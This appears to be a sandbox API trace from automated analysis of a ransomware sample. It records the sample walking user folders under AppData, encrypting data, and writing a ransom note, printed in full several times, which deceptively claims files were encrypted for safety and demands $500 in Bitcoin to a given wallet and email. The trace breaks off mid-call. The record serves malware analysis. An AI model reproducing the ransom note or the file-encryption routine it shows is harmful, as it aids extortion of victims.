lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.") returned 88 [0090.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.382] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.382] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.382] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\..") returned 89 [0090.382] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.382] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.382] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.383] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.383] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.383] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt") returned 104 [0090.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.383] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.383] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.384] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.384] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.384] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.384] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.384] CloseHandle (hObject=0x150) returned 1 [0090.384] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Windows") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Program Files") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Program Files (x86)") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="$Recycle.bin") returned 1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="System Volume Information") returned -1 [0090.384] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 86 [0090.384] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0090.384] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0090.384] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned 88 [0090.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.") returned 88 [0090.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.385] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.385] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.385] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\..") returned 89 [0090.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.385] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.385] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.385] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.385] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt") returned 104 [0090.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.386] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.386] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.387] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.387] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.387] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.387] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.387] CloseHandle (hObject=0x150) returned 1 [0090.387] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.387] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.387] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt") returned 99 [0090.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.388] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.388] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.389] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.389] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.389] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.389] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.389] CloseHandle (hObject=0x14c) returned 1 [0090.390] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.390] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.390] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt") returned 96 [0090.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.390] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.390] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.391] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.391] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.391] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.391] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.391] CloseHandle (hObject=0xd8) returned 1 [0090.391] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0090.392] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0090.392] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0090.392] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned 69 [0090.392] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0090.392] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0090.392] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned 71 [0090.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 